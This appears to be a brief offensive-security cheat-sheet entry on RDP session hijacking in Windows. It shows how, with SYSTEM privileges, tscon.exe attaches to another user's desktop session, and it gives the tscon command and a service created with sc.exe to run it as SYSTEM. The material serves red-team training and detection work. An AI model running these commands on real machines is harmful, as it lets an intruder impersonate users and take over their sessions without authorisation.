RDP Session Hijacking

To successfully impersonate a user without their password, we need to have SYSTEM privileges and use the Microsoft tscon.exe binary that enables users to connect to another desktop session. It works by specifying which SESSION ID we would like to connect to which session name . So, for example, the following command will open a new console as the specified SESSION_ID within our current RDP session:

Use

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

sc.exe create sessionhijack binpath= "cmd.exe /k tscon {ID} /dest:{Session-name}

net start sessionhijack

\